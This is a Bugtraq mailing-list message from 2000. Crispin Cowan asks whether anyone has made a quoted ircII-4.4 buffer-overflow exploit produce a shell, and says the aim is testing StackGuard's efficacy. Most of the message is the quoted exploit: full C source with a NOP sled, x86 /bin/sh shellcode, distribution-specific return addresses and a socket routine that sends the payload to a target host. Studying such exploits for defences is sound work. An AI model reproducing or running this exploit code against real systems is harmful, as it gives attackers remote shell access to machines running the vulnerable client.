[14477] in bugtraq
Re: Fwd: ircii-4.4 buffer overflow
daemon@ATHENA.MIT.EDU (Crispin Cowan)
Thu Apr 6 16:54:43 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <38E98DBB.931F9340@wirex.com>
Date: Tue, 4 Apr 2000 06:37:47 +0000
Reply-To: crispin@WIREX.COM
From: Crispin Cowan <crispin@WIREX.COM>
X-To: bladi <bladi@EUSKALNET.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
bladi wrote:
> /*
>
> ircii-4.4 exploit by bladi & aLmUDeNa
Has anyone succeeded in getting this exploit to actually produce a shell?
Pointers & advice appreciated.
Yes, this is a legitimate question: it is further penetration testing on
StackGuard efficacy.
Thanks,
Crispin
-----
Crispin Cowan, CTO, WireX Communications, Inc. http://wirex.com
Free Hardened Linux Distribution: http://immunix.org
JOBS! http://immunix.org/jobs.html
>
>
> buffer overflow in ircii dcc chat's
> allow to excute arbitrary
>
> Affected:
> ircII-4.4
>
> Patch:
> Upgrade to ircII-4.4M
> ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz
>
> Offset:
> SuSe 6.x :0xbfffe3ff
> RedHat :0xbfffe888
>
> Thanks to : #warinhell,#hacker_novatos
> Special thanks go to: Topo[lb],
> Saludos para todos los que nos conozcan especialmente para eva ;)
> (bladi@euskalnet.net)
> */
>
> #include <stdio.h>
> #include <netdb.h>
> #include <string.h>
> #include <signal.h>
> #include <unistd.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
>
> char *h_to_ip(char *hostname);
> char *h_to_ip(char *hostname) {
> struct hostent *hozt;
> struct sockaddr_in tmp;
> struct in_addr in;
> if ((hozt=gethostbyname(hostname))==NULL)
> {
> printf(" ERROR: IP incorrecta\n");
> exit(0);
> }
> memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
> memcpy(&in,&tmp.sin_addr.s_addr,4);
> return(inet_ntoa(in));
> }
> main(int argc, char *argv[])
> {
> struct sockaddr_in sin;
> char *hostname;
> char nops[] =
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
> char *shell =
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> int outsocket,tnt,i;
> printf (" irciismash ver: 1.0\n");
> printf (" by \n");
> printf (" bladi & aLmUDeNa\n\n");
>
> if (argc<3)
> {
> printf("Usage : %s hostname port\n",argv[0]);
> exit(-1);
> }
> hostname=argv[1];
> outsocket=socket(AF_INET,SOCK_STREAM,0);
> sin.sin_family=AF_INET;
> sin.sin_port=htons(atoi(argv[2]));
> sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
> if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
> printf(" ERROR: El puerto esta cerradito :_(\n");
> exit(0);
> }
> printf("[1]- Noping\n [");
> for(i=0;i<47;i++)
> {
> if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
> write(outsocket,nops,strlen(nops));
> }
> printf("]\n");
> printf(" Noped\n");
> printf("[2]- Injectin shellcode\n");
> write(outsocket,shell,strlen(shell));
> usleep(999);
> printf(" Injected\n");
> printf("[3]- Waiting\n [");
> for(i=0;i<299;i++)
> {
> printf(".");
> fflush(stdout);
> usleep(99);
> write(outsocket,"\xff",strlen("\xff"));
> write(outsocket,"\xbf",strlen("\xff"));
> write(outsocket,"\xff",strlen("\xe9"));
> write(outsocket,"\xe3",strlen("\xff"));
> }
> printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
> close(outsocket);
> }
